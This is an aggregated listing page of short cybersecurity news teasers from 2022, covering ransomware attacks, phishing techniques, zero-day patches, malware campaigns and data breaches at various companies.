Protergo Content Editor

Clever phishing method bypasses MFA using Microsoft WebView2 apps

A clever, new phishing technique uses Microsoft Edge WebView2 applications to steal victim’s authentication cookies, allowing threat actors to bypass multi-factor authentication when logging into stolen accounts. With the large number of data breaches, remote access trojan attacks, and phishing campaigns, stolen login credentials have become abundant. However, the increasing adoption of multi-factor authentication (MFA) …

Clever phishing method bypasses MFA using Microsoft WebView2 apps Read More »

Mitel zero-day used by hackers in suspected ransomware attack

Hackers used a zero-day exploit on Linux-based Mitel MiVoice VOIP appliances for initial access in what is believed to be the beginning of a ransomware attack. Mitel VOIP devices are used by critical organizations in various sectors for telephony services and were recently exploited by threat actors for high-volume DDoS amplification attacks. In a new report by CrowdStrike, the company …

Mitel zero-day used by hackers in suspected ransomware attack Read More »

Yodel parcel company confirms cyberattack is disrupting delivery

Services for the U.K.-based Yodel delivery service company have been disrupted due to a cyberattack that caused delays in parcel distribution and tracking orders online. The company has not published any details about the incident, such as when it occurred or its nature but implies that customer payment information has not been affected since it …

Yodel parcel company confirms cyberattack is disrupting delivery Read More »

Thousands of GitHub, AWS, Docker tokens exposed in Travis CI logs

For a second time in less than a year, the Travis CI platform for software development and testing has exposed user data containing authentication tokens that could give access to developers’ accounts on GitHub, Amazon Web Services, and Docker Hub. Researchers at Aqua Security discovered that “tens of thousands of user tokens” are exposed through …

Thousands of GitHub, AWS, Docker tokens exposed in Travis CI logs Read More »

Extortion gang ransoms Shoprite, largest supermarket chain in Africa

Shoprite Holdings, Africa’s largest supermarket chain that operates almost three thousand stores across twelve countries in the continent, has been hit by a ransomware attack. Shoprite is Africa’s largest supermarket chain, with a revenue of $5.8 billion and149,000 employees. The retailer has 2,943 stores, serving millions of customers in South Africa, Nigeria, Ghana, Madagascar, Mozambique, Namibia, …

Extortion gang ransoms Shoprite, largest supermarket chain in Africa Read More »

Microsoft patches actively exploited Follina Windows zero-day

Microsoft has released security updates with the June 2022 cumulative Windows Updates to address a critical Windows zero-day vulnerability known as Follina and actively exploited in ongoing attacks. “Microsoft strongly recommends that customers install the updates to be fully protected from the vulnerability. Customers whose systems are configured to receive automatic updates do not need …

Microsoft patches actively exploited Follina Windows zero-day Read More »

2 million patients impacted by a cyberattack on a healthcare organization

Massachusetts-based Shields Heath Care Group experienced a cyber incident that might have impacted the personal data of 2 million patients. “To date, we have no evidence to indicate that any information from this incident was used to commit identity theft or fraud,” the group said. On 28 March 2022, Shields was alerted about the suspicious …

2 million patients impacted by a cyberattack on a healthcare organization Read More »

Potent Emotet Variant Spreads Via Stolen Email Credentials

The dangerous malware appears to be well and truly back in action, sporting new variants and security-dodging behaviors in a wave of recent phishing campaigns. Emotet’s resurgence in April seems to be the signal of a full comeback for what was once dubbed “the most dangerous malware in the world,” with researchers spotting various new …

Potent Emotet Variant Spreads Via Stolen Email Credentials Read More »

‘Follina’ Vulnerability Exploited to Deliver Qbot, AsyncRAT, Other Malware

Several malware families are being delivered using the recently disclosed Windows vulnerability identified as Follina and CVE-2022-30190, which remains without an official patch. The vulnerability, related to the Microsoft Support Diagnostic Tool (MSDT), can be exploited for remote code execution using specially crafted documents. While the root cause of the security hole appears to have …

‘Follina’ Vulnerability Exploited to Deliver Qbot, AsyncRAT, Other Malware Read More »

TrojanSMS malware spreading via two malicious Android app stores

The malware spreads through push notifications, alerts, and malvertising on free video streaming, adult sites, and game-hack pages. TrojanSMS, which the company calls SMSFactory, siphons money from victims worldwide, including the US, France, and Spain, by sending premium SMS and making calls to premium-rate phone numbers. “These numbers appear to be part of a conversion …

TrojanSMS malware spreading via two malicious Android app stores Read More »

Researchers Uncover Malware Controlling Thousands of Sites in Parrot TDS Network

The Parrot traffic direction system (TDS) that came to light earlier this year has had a larger impact than previously thought, according to new research. Sucuri, which has been tracking the same campaign since February 2019 under the name “NDSW/NDSX,” said that “the malware was one of the top infections” detected in 2021, accounting for …

Researchers Uncover Malware Controlling Thousands of Sites in Parrot TDS Network Read More »

Stolen credentials of US universities advertised all over the web

Criminal forums are full of recently stolen admin-level credentials from various US-based colleges and universities. Cybercriminals advertise a wide variety of US education institution credentials for sale, the FBI warned. Some credentials are sold on publicly accessible forums. “This exposure of sensitive credential and network access information, especially privileged user accounts, could lead to subsequent cyberattacks …

Stolen credentials of US universities advertised all over the web Read More »

Flights cancelled over a ransomware attack on an airline

Indian low-cost airline SpiceJet was forced to cancel several flights, leaving hundreds stranded at the airport. The airline announced it suffered from a ransomware attack on the official company’s account, claiming that the incident impacted SpiceJet’s flight operations. “While our IT team has to a large extent contained and rectified the situation, this has had …

Flights cancelled over a ransomware attack on an airline Read More »

GitHub: Attackers stole login details of 100K npm user accounts

GitHub revealed today that an attacker stole the login details of roughly 100,000 npm accounts during a mid-April security breach with the help of stolen OAuth app tokens issued to Heroku and Travis-CI. The threat actor successfully breached and exfiltrated data from private repositories belonging to dozens of organizations. GitHub disclosed this security breach on April 15, …

GitHub: Attackers stole login details of 100K npm user accounts Read More »

DDoS attackers pose as REvil, sparking fear the gang is back

Attackers claim they represent the infamous REvil ransomware gang, considered defunct for months. A recent distributed denial-of-service (DDoS) attack against a hospitality firm displayed a familiar message, as the attackers named themselves REvil. A report by Akamai, a cloud networking provider, says that the company’s client was targeted with a DDoS attack. Interestingly, in the note demanding …

DDoS attackers pose as REvil, sparking fear the gang is back Read More »

Cyberattack behind Greenland’s healthcare ‘system crash’

Island nation’s health system workers fell back on using phones after a cyberattack knocked out IT systems. The chief governing body of Greenland, Naalakkersuisut, announced that a cyberattack caused IT systems to crash throughout the world’s largest island. To mitigate the issues caused by the attack, operators were forced to restart IT systems and servers that run …

Cyberattack behind Greenland’s healthcare ‘system crash’ Read More »

Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover

Privilege escalation flaw discovered in the Jupiter and JupiterX Core Plugin affects more than 90,000 sites. A critical privilege escalation flaw found in two themes used by more than 90,000 WordPress sites can allow threat actors to take over the sites completely, researchers have found. WordFence Threat Intelligence Team researcher Ramuel Gall discovered the flaw, …

Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover Read More »

Sysrv-K Botnet Targets Windows, Linux

Microsoft researchers say they are tracking a botnet that is leveraging bugs in the Spring Framework and WordPress plugins. Unpatched vulnerabilities in the Spring Framework and WordPress plugins are being exploited by cybercriminals behind the Sysrv botnet to target Linux and Windows systems. The goal, according to researchers, is to infect systems with cryptomining malware. …

Sysrv-K Botnet Targets Windows, Linux Read More »

Researchers Find Potential Way to Run Malware on iPhone Even When it’s OFF

A first-of-its-kind security analysis of iOS Find My function has identified a novel attack surface that makes it possible to tamper with the firmware and load malware onto a Bluetooth chip that’s executed while an iPhone is “off.” The mechanism takes advantage of the fact that wireless chips related to Bluetooth, Near-field communication (NFC), and …

Researchers Find Potential Way to Run Malware on iPhone Even When it’s OFF Read More »

Threat Actors Use Telegram to Spread ‘Eternity’ Malware-as-a-Service

An account promoting the project—which offers a range of threat activity from info-stealing to crypto-mining to ransomware as individual modules—has more than 500 subscribers. Cybercriminals are promoting a new, modular malware-as-a-service offering that allows would-be attackers to choose from a cornucopia of threats via a Telegram channel that to date has more than 500 subscribers, researchers have …

Threat Actors Use Telegram to Spread ‘Eternity’ Malware-as-a-Service Read More »

Novel ‘Nerbian’ Trojan Uses Advanced Anti-Detection Tricks

The stealthy, feature-rich malware has multistage evasion tactics to fly under the radar of security analysis, researchers at Proofpoint have found. A newly discovered and complex remote access trojan (RAT) is spreading via malicious email campaigns using COVID-19 lures and includes numerous features to evade analysis or detection by researchers, Proofpoint has found. Dubbed Nerbian RAT, the …

Novel ‘Nerbian’ Trojan Uses Advanced Anti-Detection Tricks Read More »

Another Set of Joker Trojan-Laced Android Apps Resurfaces on Google Play Store

A new set of trojanized apps spread via the Google Play Store has been observed distributing the notorious Joker malware on compromised Android devices. Joker, a repeat offender, refers to a class of harmful apps that are used for billing and SMS fraud, while also performing a number of actions of a malicious hacker’s choice, such as …

Another Set of Joker Trojan-Laced Android Apps Resurfaces on Google Play Store Read More »

Hackers Are Now Hiding Malware in Windows Event Logs

Security researchers have noticed a malicious campaign that used Windows event logs to store malware, a technique that has not been previously documented publicly for attacks in the wild. The method enabled the threat actor behind the attack to plant fileless malware in the file system in an attack filled with techniques and modules designed …

Hackers Are Now Hiding Malware in Windows Event Logs Read More »

Lincoln College Closed After 157 Years Due Ransomware Attack

Lincoln College, a liberal-arts school from rural Illinois, says it will close its doors later this month, 157 years since its founding and following a brutal hit on its finances from the COVID-19 pandemic and a recent ransomware attack. This decision was made even harder with the college having survived multiple disasters, including a major …

Lincoln College Closed After 157 Years Due Ransomware Attack Read More »

Cloud Tech Powers the Hybrid-remote Workforce — and Increases Insider Risk

Cybersecurity practitioners are sounding the alarm bells. Amplified by the not-going-away-anytime-soon Great Resignation and the here-to-stay shift to hybrid-remote work models, Insider Risk sees exponential growth. Exponential growth, lagging indicators, flattening the curve — the pandemic forced us all to get familiar with concepts like these. And these same ideas are extremely relevant to how …

Cloud Tech Powers the Hybrid-remote Workforce — and Increases Insider Risk Read More »

‘Hack DHS’ Bug Hunters Finds 122 Security Flaws in DHS Systems

The Department of Homeland Security (DHS) today revealed that bug bounty hunters enrolled in its ‘Hack DHS’ bug bounty program have found 122 security vulnerabilities in external DHS systems, 27 of them rated critical severity. DHS awarded a total of $125,600 to over 450 vetted security researchers and ethical hackers, with rewards of up to …

‘Hack DHS’ Bug Hunters Finds 122 Security Flaws in DHS Systems Read More »

Most Email Security Approaches Fail to Block Common Threats

A full 89 percent of organizations experienced one or more successful email breaches during the previous 12 months, translating into big-time costs. On overwhelming number of security teams believe their email security systems to be ineffective against the most serious inbound threats, including ransomware. That’s according to a survey of business customers using Microsoft 365 …

Most Email Security Approaches Fail to Block Common Threats Read More »

Hackers steal $655K after picking MetaMask seed from iCloud backup

MetaMask has published a warning for their iOS users about the seeds of cryptocurrency wallets being stored in Apple’s iCloud if app data backup is active. MetaMask is a “hot” cryptocurrency wallet used by over 21 million investors to store their wallet tokens and manage their digital assets. In cryptocurrency lingo, a seed is a secret recovery …

Hackers steal $655K after picking MetaMask seed from iCloud backup Read More »

Cisco vulnerability lets hackers craft their own login credentials

Cisco has released a security advisory to warn about a critical vulnerability (CVSS v3 score: 10.0), tracked as CVE-2022-20695, impacting the Wireless LAN Controller (WLC) software.  The security flaw allows remote attackers to log in to target devices through the management interface without using a valid password. The bug involves the improper implementation of the …

Cisco vulnerability lets hackers craft their own login credentials Read More »

Menswear Brand Zegna Reveals Ransomware Attack

Accounting materials from the Italy-based luxury fashion house were leaked online by RansomExx because the company refused to pay. High-end Italian fashion house Ermenegildo Zegna revealed on Monday that it was the target of a ransomware attack last August — and that it managed to recover its systems from back-up without paying a ransom. The …

Menswear Brand Zegna Reveals Ransomware Attack Read More »

‘Resilient’ gang traded card fraud for ransoms, says report

A cybercriminal group once notorious for digital payment card theft is believed to have switched its focus to ransomware attacks, in a reminder of just how versatile threat actors have become. Crooks thought to be affiliated to the FIN7 group – which shot to notoriety last decade when it used malware to steal millions of …

‘Resilient’ gang traded card fraud for ransoms, says report Read More »

Hackers breach MailChimp’s internal tools to target crypto customers

Email marketing firm MailChimp disclosed on Sunday that they had been hit by hackers who gained access to internal customer support and account management tools to steal audience data and conduct phishing attacks. Sunday morning, Twitter was abuzz with reports from owners of Trezor hardware cryptocurrency wallets who received phishing notifications claiming that the company suffered a data breach. …

Hackers breach MailChimp’s internal tools to target crypto customers Read More »

Researchers Uncover New Android Spyware With C2 Server Linked to Turla Hackers

An Android spyware application has been spotted masquerading as a “Process Manager” service to stealthily siphon sensitive information stored in the infected devices. Interestingly, the app — that has the package name “com.remote.app” — establishes contact with a remote command-and-control server, 82.146.35[.]240, which has been previously identified as infrastructure belonging to the Russia-based hacking group …

Researchers Uncover New Android Spyware With C2 Server Linked to Turla Hackers Read More »

Apple Rushes Out Patches for 0-Days in MacOS, iOS

The vulnerabilities could allow threat actors to disrupt or access kernel activity and may be under active exploit. Apple rushed out patches for two zero-days affecting macOS and iOS Thursday, both of which are likely under active exploitation and could allow a threat actor to disrupt or access kernel activity. Apple released separate security updates for the bugs …

Apple Rushes Out Patches for 0-Days in MacOS, iOS Read More »

Spring patches leaked Spring4Shell zero-day RCE vulnerability

Spring released emergency updates to fix the ‘Spring4Shell’ zero-day remote code execution vulnerability, which leaked prematurely online before a patch was released. Yesterday, an exploit for a zero-day remote code execution vulnerability in the Spring Framework dubbed ‘Spring4Shell’ was briefly published on GitHub and then removed. However, as nothing stays hidden on the Internet, the code was …

Spring patches leaked Spring4Shell zero-day RCE vulnerability Read More »

Crypto Stealing Malware Spreads via Fake Wallet Apps

Researchers have uncovered dozens of trojanized cryptocurrency wallet apps performing malicious activities. The goal of these apps is to steal cryptocurrency funds, especially from Chinese users. The fake apps operation ESET researchers have revealed over 40 copycat websites of popular cryptocurrency wallets.  These impersonated websites are promoted via ads placed on legitimate sites, along with adverts …

Crypto Stealing Malware Spreads via Fake Wallet Apps Read More »

Cyberattackers Target UPS Backup Power Devices in Mission-Critical Environments

The active attacks could result in critical-infrastructure damage, business disruption, lateral movement and more. Cyberattackers are targeting uninterruptible power supply (UPS) devices, which provide battery backup power during power surges and outages. UPS devices are usually used in mission-critical environments, safeguarding critical infrastructure installations and important computer systems and IT equipment, so the stakes are …

Cyberattackers Target UPS Backup Power Devices in Mission-Critical Environments Read More »

Globant confirms hack after Lapsus$ leaks 70GB of stolen data

IT and software consultancy firm Globant has confirmed that they were breached by the Lapsus$ data extortion group, where data consisting of administrator credentials and source code was leaked by the threat actors. As part of the leak, the hacking group released a 70GB archive of data stolen from Globant, describing it as “some customers …

Globant confirms hack after Lapsus$ leaks 70GB of stolen data Read More »

Critical Sophos Firewall vulnerability allows remote code execution

Sophos has fixed a critical vulnerability in its Sophos Firewall product that allows remote code execution (RCE). Tracked as CVE-2022-1040, the authentication bypass vulnerability exists in the User Portal and Webadmin areas of Sophos Firewall. RCE bug in web administration console On Friday, Sophos disclosed a critical remote code execution vulnerability impacting Sophos Firewall versions 18.5 MR3 (18.5.3) and earlier that the …

Critical Sophos Firewall vulnerability allows remote code execution Read More »

Hive ransomware ports its Linux VMware ESXi encryptor to Rust

The Hive ransomware operation has converted their VMware ESXi Linux encryptor to the Rust programming language and added new features to make it harder for security researchers to snoop on victim’s ransom negotiations. As the enterprise becomes increasingly reliant on virtual machines to save computer resources, consolidate servers, and for easier backups, ransomware gangs are …

Hive ransomware ports its Linux VMware ESXi encryptor to Rust Read More »

CISA adds 66 vulnerabilities to list of bugs exploited in attacks

The Cybersecurity and Infrastructure Security Agency (CISA) has added a massive set of 66 actively exploited vulnerabilities to its catalog of ‘Known Exploited Vulnerabilities.’ These flaws have been observed in real cyberattacks against organizations, so they are published to raise awareness to system administrations and serve as official advisories for applying the corresponding security updates. …

CISA adds 66 vulnerabilities to list of bugs exploited in attacks Read More »

Google Chrome Zero-Day Bugs Exploited Weeks Ahead of Patch

Two separate campaigns from different threat actors targeted users with the same exploit kit for more than a month before the company fixed an RCE flaw found in February. North Korean threat actors exploited a remote code execution (RCE) zero-day vulnerability in Google’s Chrome web browser weeks before the bug was discovered and patched, according …

Google Chrome Zero-Day Bugs Exploited Weeks Ahead of Patch Read More »

Microsoft and Okta Confirm Breach by LAPSUS$ Extortion Group

Microsoft on Tuesday confirmed that the LAPSUS$ extortion-focused hacking crew had gained “limited access” to its systems, as authentication services provider Okta revealed that nearly 2.5% of its customers have been potentially impacted in the wake of the breach. “No customer code or data was involved in the observed activities,” Microsoft’s Threat Intelligence Center (MSTIC) said, adding …

Microsoft and Okta Confirm Breach by LAPSUS$ Extortion Group Read More »

Windows zero-day flaw giving admin rights gets an unofficial patch, again

A Windows local privilege escalation zero-day vulnerability that Microsoft has failed to fully address for several months now, allows users to gain administrative privileges in Windows 10, Windows 11, and Windows Server. The locally exploited vulnerability in Windows User Profile Service is tracked as CVE-2021-34484 and was given a CVSS v3 score of 7.8. While …

Windows zero-day flaw giving admin rights gets an unofficial patch, again Read More »

Android password-stealing malware infects 100,000 Google Play users

A malicious Android app that steals Facebook credentials has been installed over 100,000 times via the Google Play Store, with the app still available to download. The Android malware is disguised as a cartoonifier app called ‘Craftsart Cartoon Photo Tools,’ allowing users to upload an image and convert it into a cartoon rendering. Over the …

Android password-stealing malware infects 100,000 Google Play users Read More »

Unsecured Microsoft SQL, MySQL servers hit by Gh0stCringe malware

Hackers target poorly secured Microsoft SQL and MySQL database servers to deploy the Gh0stCringe remote access trojans on vulnerable devices. Gh0stCringe, aka CirenegRAT, is a variant of Gh0st RAT malware that was most recently deployed in 2020 Chinese cyber-espionage operations but dates as far back as 2018. In a new report today by cybersecurity firm AhnLab, researchers …

Unsecured Microsoft SQL, MySQL servers hit by Gh0stCringe malware Read More »

Hackers Target Bank Networks with new Rootkit to Steal Money from ATM Machines

A financially motivated threat actor has been observed deploying a previously unknown rootkit targeting Oracle Solaris systems with the goal of compromising Automatic Teller Machine (ATM) switching networks and carrying out unauthorized cash withdrawals at different banks using fraudulent cards. Threat intelligence and incident response firm Mandiant is tracking the cluster under the moniker UNC2891, …

Hackers Target Bank Networks with new Rootkit to Steal Money from ATM Machines Read More »

Google Uncovers ‘Initial Access Broker’ Working with Conti Ransomware Gang

Google’s Threat Analysis Group (TAG) took the wraps off a new initial access broker that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations. Dubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform (CVE-2021-40444) …

Google Uncovers ‘Initial Access Broker’ Working with Conti Ransomware Gang Read More »

Phony Instagram ‘Support Staff’ Emails Hit Insurance Company

The phishing scam tried to steal login credentials by threatening account shutdown, due to users having purportedly shared “fake content.” A phishing campaign used the guise of Instagram technical support to steal login credentials from employees of a prominent U.S. life insurance company headquartered in New York, researchers have revealed. According to a report published on Wednesday, …

Phony Instagram ‘Support Staff’ Emails Hit Insurance Company Read More »

Pandora Ransomware Hits Giant Automotive Supplier Denso

Denso confirmed that cybercriminals leaked stolen, classified information from the Japan-based car-components manufacturer after an attack on one of its offices in Germany. A multibillion supplier to key automotive companies like Toyota, Mercedes-Benz and Ford confirmed Monday that it was the target of a cyberattack over the weekend – confirmation that came after the Pandora …

Pandora Ransomware Hits Giant Automotive Supplier Denso Read More »

Cyberattacks Against Israeli Government Sites: ‘Largest in the Country’s History’

DDoS attacks against Israel telecom companies took down government sites, sparking a temporary state of emergency. Israel’s Nation Cyber Directorate confirmed in a tweet on Monday that a denial-of-service (DDoS) attack against a telecommunications provider took down several government sites, as well as others not affiliated with the government. The incident led to the Directorate …

Cyberattacks Against Israeli Government Sites: ‘Largest in the Country’s History’ Read More »

Ubisoft confirms ‘cyber security incident’, resets staff passwords

Video game developer Ubisoft has confirmed that it suffered a ‘cyber security incident’ that caused disruption to its games, systems, and services. The announcement comes after multiple Ubisoft users had reported issues last week accessing their Ubisoft service. Data extortion group LAPSUS$, who has claimed responsibility for hacking Samsung, NVIDIA, and Mercado Libre thus far, appears to be behind …

Ubisoft confirms ‘cyber security incident’, resets staff passwords Read More »

Bridgestone Americas confirms ransomware attack, LockBit leaks data

A cyberattack on Bridgestone Americas, one of the largest manufacturers of tires in the world, has been claimed by the LockBit ransomware gang. The threat actor announced that they will leak all data stolen from the company and launched a countdown timer, which is currently at less than three hours. Timer activated Bridgestone has tens …

Bridgestone Americas confirms ransomware attack, LockBit leaks data Read More »

Emotet Botnet’s Latest Resurgence Spreads to Over 100,000 Computers

The insidious Emotet botnet, which staged a return in November 2021 after a 10-month-long hiatus, is once again exhibiting signs of steady growth, amassing a swarm of over 100,000 infected hosts for perpetrating its malicious activities. “While Emotet has not yet attained the same scale it once had, the botnet is showing a strong resurgence …

Emotet Botnet’s Latest Resurgence Spreads to Over 100,000 Computers Read More »

RuRAT Campaign Uses Innovative Lure to Target Potential Victims

A malicious campaign is installing RuRAT malware that provides remote access for compromised devices. The attackers are impersonating a venture capital firm wanting to invest money or purchase the victim’s site. Recently, BleepingComputer received a spear-phishing email from an IP address belonging to a U.K virtual server company. The email impersonated a venture capitalist interested in buying …

RuRAT Campaign Uses Innovative Lure to Target Potential Victims Read More »

European Officials Aiding the Ukrainian Refugee Movement are Under Attack

A spear-phishing campaign has been identified targeting European government personnel helping Ukrainian refugees. The campaign is still ongoing and is being tracked as Asylum Ambuscade. According to Proofpoint, a nation-state actor is believed to have compromised a Ukrainian armed service member’s email account to target European government personnel aiding refugees fleeing Ukraine. The phishing messages included …

European Officials Aiding the Ukrainian Refugee Movement are Under Attack Read More »

Adafruit discloses data leak from ex-employee’s GitHub repo

Adafruit has disclosed a data leak that occurred due to a publicly-viewable GitHub repository. The company suspects this could have allowed “unauthorized access” to information about certain users on or before 2019. Based in New York City, Adafruit is a producer of open-source hardware components since 2005. The company designs, manufactures, and sells electronics products, tools, and accessories. …

Adafruit discloses data leak from ex-employee’s GitHub repo Read More »

Mozilla Firefox 97.0.2 fixes two actively exploited zero-day bugs

​Mozilla has released Firefox 97.0.2, Firefox ESR 91.6.1, Firefox for Android 97.3.0, and Focus 97.3.0 to fix two critical zero-day vulnerabilities actively exploited in attacks. Both zero-day vulnerabilities are “Use-after-free” bugs, which is when a program tries to use memory that has been previously cleared. When threat actors exploit this type of bug, it can …

Mozilla Firefox 97.0.2 fixes two actively exploited zero-day bugs Read More »

Hackers leak 190GB of alleged Samsung data, source code

The Lapsus$ data extortion group leaked today a huge collection of confidential data they claim to be from Samsung Electronics, the South Korean giant consumer electronics company. The leak comes less than a week after Lapsus$ released a 20GB document archive from 1TB of data stolen from Nvidia GPU designer. Gang teases Samsung data leak In a …

Hackers leak 190GB of alleged Samsung data, source code Read More »

NVIDIA data breach exposed credentials of over 71,000 employees

More than 71,000 employee credentials were stolen and leaked online following a data breach suffered by US chipmaker giant Nvidia last month. The Have I Been Pwned data breach notification service has added data belonging to 71,335 compromised accounts to its database on Wednesday. Have I Been Pwned says the stolen data contains “email addresses …

NVIDIA data breach exposed credentials of over 71,000 employees Read More »

Ukraine says local govt sites hacked to push fake capitulation news

The Security Service of Ukraine (SSU) said today “enemy” hackers are using compromised local government and regional authorities’ websites to push rumors that Ukraine surrendered and signed a peace treaty with Russia. SSU revealed this in a tweet further distributed by Ukraine’s State Service for Special Communication and Information Protection (SSSCIP) to Ukrainian Twitter users. “WARNING! ANOTHER FAKE! The enemy has broken into …

Ukraine says local govt sites hacked to push fake capitulation news Read More »

Cisco Patches Critical Vulnerabilities in Expressway, TelePresence VCS Products

Cisco this week announced patches that address a couple of critical vulnerabilities in its Expressway Series and TelePresence Video Communication Server (VCS) unified communications products. Tracked as CVE-2022-20754 and CVE-2022-20755 and featuring a CVSS score of 9.0, the two security holes can be exploited by a remote, authenticated attacker to write files or execute code …

Cisco Patches Critical Vulnerabilities in Expressway, TelePresence VCS Products Read More »

Conti Ransomware Decryptor, TrickBot Source Code Leaked

The decryptor spilled by ContiLeaks won’t work with recent victims. Conti couldn’t care less: It’s still operating just fine. Still, the dump is a bouquet’s worth of intel. The pro-Ukraine member of the Conti ransomware gang who promised to eviscerate the extortionists after they pledged support for the Russian government has spilled yet more Conti guts: The …

Conti Ransomware Decryptor, TrickBot Source Code Leaked Read More »

TeaBot Trojan Haunts Google Play Store, Again

Malicious Google Play apps have circumvented censorship by hiding trojans in software updates. The TeaBot banking trojan – also known as “Anatsa” – has been spotted on the Google Play store, researchers from Cleafy have discovered. The malware – designed to intercept SMS messages and login credentials from unwitting users – affected users of “more than …

TeaBot Trojan Haunts Google Play Store, Again Read More »

RCE Bugs in Hugely Popular VoIP Apps: Patch Now!

The flaws are in the ubiquitous open-source PJSIP multimedia communication library, used by the Asterisk PBX toolkit that’s found in a massive number of VoIP implementations. Some of the world’s most popular communication apps are using an open-source library riddled with newfound security holes. One thing this open-source, flawed library shares with the Apache Log4J …

RCE Bugs in Hugely Popular VoIP Apps: Patch Now! Read More »

Toyota to Close Japan Plants After Suspected Cyberattack

The plants will shut down on Tuesday, halting about a third of the company’s global production. Toyota doesn’t know how long the 14 plants will be unplugged. What was potentially a cyberattack hit one of Toyota’s parts suppliers, causing the company to move to shut down about a third of the company’s global production tomorrow, …

Toyota to Close Japan Plants After Suspected Cyberattack Read More »

Microsoft Exchange Bugs Exploited by ‘Cuba’ Ransomware Gang

The ransomware gang known as Cuba is increasingly shifting to exploiting Exchange bugs – including crooks’ favorites, ProxyShell and ProxyLogon – as initial infection vectors. The ransomware gang known as “Cuba” is increasingly shifting to exploiting Microsoft Exchange vulnerabilities – including ProxyShell and ProxyLogon – as initial infection vectors, researchers have found. The group has likely been prying open …

Microsoft Exchange Bugs Exploited by ‘Cuba’ Ransomware Gang Read More »

New Critical RCE Bug Found in Adobe Commerce, Magento

Adobe updated its recent out-of-band security advisory to add another critical bug, while researchers put out a PoC for the one it emergency-fixed last weekend. Yet another zero-day bug has been discovered in the Magento Open Source and Adobe Commerce platforms, while researchers have created a working proof-of-concept (PoC) exploit for the recently patched CVE-2022-24086 …

New Critical RCE Bug Found in Adobe Commerce, Magento Read More »

Conti ransomware gang takes over TrickBot malware operation

After four years of activity and numerous takedown attempts, the death knell of TrickBot has sounded as its top members move under new management, the Conti ransomware syndicate, who plan to replace it with the stealthier BazarBackdoor malware. TrickBot is a Windows malware platform that uses multiple modules for various malicious activities, including information stealing, …

Conti ransomware gang takes over TrickBot malware operation Read More »

Microsoft Teams Targeted With Takeover Trojans

Threat actors are infiltrating the increasingly popular collaboration app to attach malicious files to chat threads that drop system-hijacking malware. Threat actors are targeting Microsoft Teams users by planting malicious documents in chat threads that execute Trojans that ultimately can take over end-user machines, researchers have found. In January, researchers at Avanan, a Check Point …

Microsoft Teams Targeted With Takeover Trojans Read More »

Critical MQTT-Related Bugs Open Industrial Networks to RCE Via Moxa

A collection of five security vulnerabilities with a collective CVSS score of 10 out of 10 threaten critical infrastructure environments that use Moxa MXview. Critical security vulnerabilities in Moxa’s MXview web-based network management system open the door to an unauthenticated remote code execution (RCE) as SYSTEM on any unpatched MXview server, researchers warned this week. …

Critical MQTT-Related Bugs Open Industrial Networks to RCE Via Moxa Read More »

Cyber-attack at Vodafone Portugal knocks mobile network services offline

A “deliberate and malicious” cyber-attack targeting Vodafone Portugal knocked mobile networks offline across the country this week. The incident, which started on Monday evening (February 7), suspended 4G and 5G networks for customers, as well as digital TV and SMS services. Vodafone said it has seen “no evidence” that customer data has been accessed or compromised due …

Cyber-attack at Vodafone Portugal knocks mobile network services offline Read More »

Fake Windows 11 upgrade installers infect you with RedLine malware

Threat actors have started distributing fake Windows 11 upgrade installers to users of Windows 10, tricking them into downloading and executing RedLine stealer malware. The timing of the attacks coincides with the moment that Microsoft announced Windows 11’s broad deployment phase, so the attackers were well-prepared for this move and waited for the right moment to maximize …

Fake Windows 11 upgrade installers infect you with RedLine malware Read More »

Swissport ransomware attack delays flights, disrupt operations

Aviation services company Swissport International has disclosed a ransomware attack that has impacted its IT infrastructure and services, causing flights to suffer delays. The Swiss company provides services for cargo handling, security, maintenance, cleaning, and lounge hospitality for 310 airports in 50 countries. It handles 282 million passengers and 4.8 million tons of cargo every year, …

Swissport ransomware attack delays flights, disrupt operations Read More »

Critical Cisco Bugs Open VPN Routers to Cyberattacks

The company’s RV line of small-business routers contains 15 different security vulnerabilities, some unpatched, that could enable everything from RCE to corporate network access and denial-of-service – and many have exploits circulating. UPDATE Critical security vulnerabilities in Cisco’s Small Business RV Series routers could allow privilege escalation, remote code execution (RCE) with root privileges on …

Critical Cisco Bugs Open VPN Routers to Cyberattacks Read More »

Office 365 boosts email security against MITM, downgrade attacks

Microsoft has added SMTP MTA Strict Transport Security (MTA-STS) support to Exchange Online to ensure Office 365 customers’ email communication integrity and security. Redmond first announced MTA-STS’ introduction in September 2020, after revealing that it was also working on adding inbound and outbound support for DNSSEC (Domain Name System Security Extensions) and DANE for SMTP (DNS-based Authentication of Named Entities). “We have been validating …

Office 365 boosts email security against MITM, downgrade attacks Read More »

Wormhole cryptocurrency platform hacked to steal $326 million

Hackers have exploited a vulnerability in the Wormhole cross-chain crypto platform to steal $326 million in cryptocurrency. Wormhole is a platform that allows users to transfer cryptocurrency across different blockchains. It does this by locking the original token in a smart contract and then minting a wrapped version of the stored token that can be transferred …

Wormhole cryptocurrency platform hacked to steal $326 million Read More »

KP Snacks Left with Crumbs After Ransomware Attack

The Conti gang strikes again, disrupting the nom-merchant’s supply chain and threatening supermarket shelves that could stay empty for weeks. KP Snacks, maker of the high-end Tyrrell’s and Popchips potato-chip brands, has suffered a ransomware attack that it said could affect deliveries to supermarkets through the end of March – at the earliest. The British …

KP Snacks Left with Crumbs After Ransomware Attack Read More »

Windows vulnerability with new public exploits lets you become admin

A security researcher has publicly disclosed an exploit for a Windows local privilege elevation vulnerability that allows anyone to gain admin privileges in Windows 10. Using this vulnerability, threat actors with limited access to a compromised device can easily elevate their privileges to help spread laterally within the network, create new administrative users, or perform …

Windows vulnerability with new public exploits lets you become admin Read More »

Zerodium Spikes Payout for Zero-Click Outlook Zero-Days

The sweetened deal came on the same day that Trustwave SpiderLabs published a new way to bypass Outlook security to deliver malicious links to victims. Zerodium has jacked up its offering price for Microsoft Outlook zero-day exploits. Act fast if you have the goods and the moral equanimity, to make up to $400,000 for a …

Zerodium Spikes Payout for Zero-Click Outlook Zero-Days Read More »

Conti, DeadBolt Ransomwares Target Delta, QNAP

QNAP had to push out an unexpected (and not entirely welcome) NAS device update, and Delta Electronics’ network has been crippled. Two Taiwanese companies were affected by separate ransomware incidents this week, forcing one to scramble to restore crippled systems and another to push out an emergency update to mitigate attacks on its customers. Delta …

Conti, DeadBolt Ransomwares Target Delta, QNAP Read More »

